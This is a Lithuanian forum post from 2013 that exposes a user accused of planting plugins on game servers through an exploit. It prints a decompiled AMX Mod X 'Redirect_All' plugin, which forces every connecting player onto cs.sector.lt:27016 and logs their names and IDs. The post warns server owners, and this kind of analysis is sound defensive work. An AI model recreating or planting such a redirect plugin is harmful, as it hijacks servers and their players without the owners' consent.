Trumpai apie sector.lt ir chemodan
Posted: 2013 Aug 12 21:36
Sveiki taigi, man nuolatos skundziasi zmones, kad jiems pakeicia failus, ar i ju serverius kelia pluginus ar dar kitaip gadina
stai vienas is projektu - sector.lt nario chemodan, naudojantis raiz0 exploitu jis ikelia plugina i serveri, ir toliau viskas buna jo rankose.
Dekompiliavau viena is jo pagr pluginu:
sis zmogus teikia dar boost paslaugas, puikiai visi zinote ka tai reiskia.
Dar viena sio parazito plugina rasite cia http://amxmodx.lt/viewtopic.php?p=23767#p23767
stai vienas is projektu - sector.lt nario chemodan, naudojantis raiz0 exploitu jis ikelia plugina i serveri, ir toliau viskas buna jo rankose.
Dekompiliavau viena is jo pagr pluginu:
Code: Select all
0x8 PROC ; public plugin_init()0xC BREAK0x10 BREAK0x14 PUSH.C 0x00x1C PUSH.C 0x00x24 PUSH.C 0xD40x2C PUSH.C 0x940x34 PUSH.C 0x100x3C SYSREQ.C 0x0 ; register_cvar("redirect_enable","1",0,0.000000)0x44 STACK 0x14 ; free 5 cells0x4C STOR.pri 0x0 ; g_enabled0x54 BREAK0x58 PUSH.C 0x00x60 PUSH.C 0x00x68 PUSH.C 0x10C0x70 PUSH.C 0xDC0x78 PUSH.C 0x100x80 SYSREQ.C 0x0 ; register_cvar("redirect_ip","cs.sector.lt",0,0.000000)0x88 STACK 0x14 ; free 5 cells0x90 STOR.pri 0x4 ; g_IP0x98 BREAK0x9C PUSH.C 0x00xA4 PUSH.C 0x00xAC PUSH.C 0x1780xB4 PUSH.C 0x1400xBC PUSH.C 0x100xC4 SYSREQ.C 0x0 ; register_cvar("redirect_port","27016",0,0.000000)0xCC STACK 0x14 ; free 5 cells0xD4 STOR.pri 0x8 ; g_port0xDC BREAK0xE0 PUSH.C 0x00xE8 PUSH.C 0x00xF0 PUSH.C 0x1CC0xF8 PUSH.C 0x1900x100 PUSH.C 0x100x108 SYSREQ.C 0x0 ; register_cvar("redirect_delay","0.0",0,0.000000)0x110 STACK 0x14 ; free 5 cells0x118 STOR.pri 0xC ; id0x120 BREAK0x124 PUSH.C 0x2200x12C PUSH.C 0x2100x134 PUSH.C 0x1DC0x13C PUSH.C 0xC0x144 SYSREQ.C 0x1 ; register_plugin("Redirect_All","1.7","Vet(3TT3V)")0x14C STACK 0x10 ; free 4 cells0x154 BREAK0x158 PUSH.C 0x24C0x160 PUSH.C 0x40x168 SYSREQ.C 0x2 ; file_exists("motd2.txt")0x170 STACK 0x8 ; free 2 cells0x178 NOT0x17C JZER 0x1A80x184 BREAK0x188 PUSH.C 0x2740x190 PUSH.C 0x40x198 SYSREQ.C 0x3 ; set_fail_state("motd2.txt file not found")0x1A0 STACK 0x8 ; free 2 cells0x1A8 BREAK0x1AC PUSH 0x0 ; g_enabled0x1B4 PUSH.C 0x40x1BC SYSREQ.C 0x4 ; get_pcvar_num(g_enabled)0x1C4 STACK 0x8 ; free 2 cells0x1CC NOT0x1D0 JZER 0x1FC0x1D8 BREAK0x1DC PUSH.C 0x2D80x1E4 PUSH.C 0x40x1EC SYSREQ.C 0x3 ; set_fail_state("Plugin disabled by CVar")0x1F4 STACK 0x8 ; free 2 cells0x1FC BREAK0x200 PUSH.C 0x1F0x208 PUSH.C 0x100x210 PUSH 0x4 ; g_IP0x218 PUSH.C 0xC0x220 SYSREQ.C 0x5 ; get_pcvar_string(g_IP,g_ipcvar[32]={""},31)0x228 STACK 0x10 ; free 4 cells0x230 BREAK0x234 PUSH.C 0x00x23C PUSH.C 0x3380x244 PUSH.C 0x100x24C PUSH.C 0xC0x254 SYSREQ.C 0x6 ; equal(g_ipcvar[32]={""},"",0)0x25C STACK 0x10 ; free 4 cells0x264 JZER 0x2900x26C BREAK0x270 PUSH.C 0x33C0x278 PUSH.C 0x40x280 SYSREQ.C 0x3 ; set_fail_state("Invalid server IP CVar")0x288 STACK 0x8 ; free 2 cells0x290 BREAK0x294 PUSH 0x8 ; g_port0x29C PUSH.C 0x40x2A4 SYSREQ.C 0x4 ; get_pcvar_num(g_port)0x2AC STACK 0x8 ; free 2 cells0x2B4 STOR.pri 0x90 ; g_portcvar0x2BC BREAK0x2C0 PUSH.C 0x3FC0x2C8 PUSH.C 0x3F00x2D0 PUSH.C 0x3B80x2D8 PUSH.C 0x3980x2E0 PUSH.C 0x100x2E8 SYSREQ.C 0x7 ; register_event("InitHUD","event_InitHUD","bd","")0x2F0 STACK 0x14 ; free 5 cells0x2F8 BREAK0x2FC PUSH.C 0x4240x304 PUSH.C 0x4000x30C PUSH.C 0x40x314 SYSREQ.C 0x8 ; get_user_msgid("VGUIMenu")0x31C STACK 0x8 ; free 2 cells0x324 PUSH.pri0x328 PUSH.C 0x80x330 SYSREQ.C 0x9 ; register_message0x338 STACK 0xC ; free 3 cells0x340 BREAK0x344 PUSH.C 0x44C0x34C PUSH.C 0x40x354 SYSREQ.C 0xA ; log_message("[AMXX] Redirect All- Plugin Initialized")0x35C STACK 0x8 ; free 2 cells0x364 BREAK0x368 ZERO.pri0x36C RETN 0x68C PROC ; public task_redirect(tid)0x690 BREAK0x694 BREAK ; new id0x698 STACK 0xFFFFFFFC ; allocate 1 cells0x6A0 LOAD.S.pri 0xC ; tid0x6A8 ADD.C 0xFFFFFF9C ; signed: -1000x6B0 STOR.S.pri 0xFFFFFFFC ; id0x6B8 BREAK ; new info1[32]0x6BC STACK 0xFFFFFF80 ; allocate 32 cells0x6C4 ZERO.pri0x6C8 ADDR.alt 0xFFFFFF7C0x6D0 FILL 0x80 ; 32 cells ; new info2[32]0x6D8 STACK 0xFFFFFF80 ; allocate 32 cells0x6E0 ZERO.pri0x6E4 ADDR.alt 0xFFFFFEFC0x6EC FILL 0x80 ; 32 cells0x6F4 BREAK0x6F8 PUSH.S 0xFFFFFFFC ; id0x700 PUSH.C 0x40x708 SYSREQ.C 0xF ; is_user_connected(id)0x710 STACK 0x8 ; free 2 cells0x718 JZER 0x7F80x720 BREAK0x724 PUSH.C 0x1F0x72C PUSH.ADR 0xFFFFFF7C ; info1[32]0x734 PUSH.S 0xFFFFFFFC ; id0x73C PUSH.C 0xC0x744 SYSREQ.C 0x11 ; get_user_name(id,info1[32],31)0x74C STACK 0x10 ; free 4 cells0x754 BREAK0x758 PUSH.C 0x1F0x760 PUSH.ADR 0xFFFFFEFC ; info2[32]0x768 PUSH.S 0xFFFFFFFC ; id0x770 PUSH.C 0xC0x778 SYSREQ.C 0x12 ; get_user_authid(id,info2[32],31)0x780 STACK 0x10 ; free 4 cells0x788 BREAK0x78C PUSH.ADR 0xFFFFFEFC ; info2[32]0x794 PUSH.ADR 0xFFFFFF7C ; info1[32]0x79C PUSH.C 0x7F80x7A4 PUSH.C 0xC0x7AC SYSREQ.C 0xA ; log_message("[Redirect] Sent %s <%s> to new server",info1[32],info2[32])0x7B4 STACK 0x10 ; free 4 cells0x7BC BREAK0x7C0 PUSH.C 0x900x7C8 PUSH.C 0x100x7D0 PUSH.C 0x8900x7D8 PUSH.S 0xFFFFFFFC ; id0x7E0 PUSH.C 0x100x7E8 SYSREQ.C 0x13 ; client_cmd(id,"echo ^"Redirecting^";Connect %s:%d",g_ipcvar[32]={""},g_portcvar={""})0x7F0 STACK 0x14 ; free 5 cells0x7F8 STACK 0x104 ; free 65 cells0x800 ZERO.pri0x804 RETN 0x5B0 PROC ; public task_show_motd(id)0x5B4 BREAK0x5B8 BREAK0x5BC PUSH.S 0xC ; id0x5C4 PUSH.C 0x40x5CC SYSREQ.C 0xF ; is_user_connected(id)0x5D4 STACK 0x8 ; free 2 cells0x5DC JZER 0x6200x5E4 BREAK0x5E8 PUSH.C 0x7F40x5F0 PUSH.C 0x7CC0x5F8 PUSH.S 0xC ; id0x600 PUSH.C 0xC0x608 SYSREQ.C 0x10 ; show_motd(id,"motd2.txt","")0x610 STACK 0x10 ; free 4 cells0x618 JUMP 0x6840x620 BREAK0x624 PUSH.C 0x00x62C PUSH.S 0xC ; id0x634 PUSH.C 0x80x63C SYSREQ.C 0xE ; remove_task(id,0)0x644 STACK 0xC ; free 3 cells0x64C BREAK0x650 PUSH.C 0x00x658 LOAD.S.pri 0xC ; id0x660 ADD.C 0x64 ; signed: 1000x668 PUSH.pri0x66C PUSH.C 0x80x674 SYSREQ.C 0xE ; remove_task0x67C STACK 0xC ; free 3 cells0x684 ZERO.pri0x688 RETN 0x370 PROC ; public event_InitHUD(id)0x374 BREAK0x378 BREAK0x37C PUSH.C 0x00x384 PUSH.C 0x5300x38C PUSH.C 0x00x394 PUSH.C 0x52C0x39C PUSH.S 0xC ; id0x3A4 PUSH.C 0x4F00x3AC PUSH.C 0x3DCCCCCD0x3B4 PUSH.C 0x1C0x3BC SYSREQ.C 0xB ; set_task(0.100000,"task_show_motd",id,"",0,"b",0)0x3C4 STACK 0x20 ; free 8 cells0x3CC BREAK0x3D0 PUSH.C 0x5380x3D8 PUSH.S 0xC ; id0x3E0 PUSH.C 0x80x3E8 SYSREQ.C 0xC ; console_print(id,"^n****************************")0x3F0 STACK 0xC ; free 3 cells0x3F8 BREAK0x3FC PUSH.C 0x5B00x404 PUSH.S 0xC ; id0x40C PUSH.C 0x80x414 SYSREQ.C 0xC ; console_print(id,"* Redirectingto our new server IP^n*")0x41C STACK 0xC ; free 3 cells0x424 BREAK0x428 PUSH.C 0x900x430 PUSH.C 0x100x438 PUSH.C 0x6480x440 PUSH.S 0xC ; id0x448 PUSH.C 0x100x450 SYSREQ.C 0xC ; console_print(id,"* %s:%d^n*",g_ipcvar[32]={""},g_portcvar={""})0x458 STACK 0x14 ; free 5 cells0x460 BREAK0x464 PUSH.C 0x6840x46C PUSH.S 0xC ; id0x474 PUSH.C 0x80x47C SYSREQ.C 0xC ; console_print(id,"* Be sure to update your Favorites")0x484 STACK 0xC ; free 3 cells0x48C BREAK0x490 PUSH.C 0x7140x498 PUSH.S 0xC ; id0x4A0 PUSH.C 0x80x4A8 SYSREQ.C 0xC ; console_print(id,"****************************^n")0x4B0 STACK 0xC ; free 3 cells0x4B8 BREAK0x4BC PUSH.C 0x00x4C4 PUSH.C 0x7C80x4CC PUSH.C 0x00x4D4 PUSH.C 0x7C40x4DC LOAD.S.pri 0xC ; id0x4E4 ADD.C 0x64 ; signed: 1000x4EC PUSH.pri0x4F0 PUSH.C 0x78C0x4F8 PUSH 0xC ; id0x500 PUSH.C 0x40x508 SYSREQ.C 0xD ; Float:get_pcvar_float(id)0x510 STACK 0x8 ; free 2 cells0x518 PUSH.pri0x51C PUSH.C 0x1C0x524 SYSREQ.C 0xB ; set_task0x52C STACK 0x20 ; free 8 cells0x534 ZERO.pri0x538 RETN 0x53C PROC ; public client_disconnect(id)0x540 BREAK0x544 BREAK0x548 PUSH.C 0x00x550 PUSH.S 0xC ; id0x558 PUSH.C 0x80x560 SYSREQ.C 0xE ; remove_task(id,0)0x568 STACK 0xC ; free 3 cells0x570 BREAK0x574 PUSH.C 0x00x57C LOAD.S.pri 0xC ; id0x584 ADD.C 0x64 ; signed: 1000x58C PUSH.pri0x590 PUSH.C 0x80x598 SYSREQ.C 0xE ; remove_task0x5A0 STACK 0xC ; free 3 cells0x5A8 ZERO.pri0x5AC RETN
sis zmogus teikia dar boost paslaugas, puikiai visi zinote ka tai reiskia.
Dar viena sio parazito plugina rasite cia http://amxmodx.lt/viewtopic.php?p=23767#p23767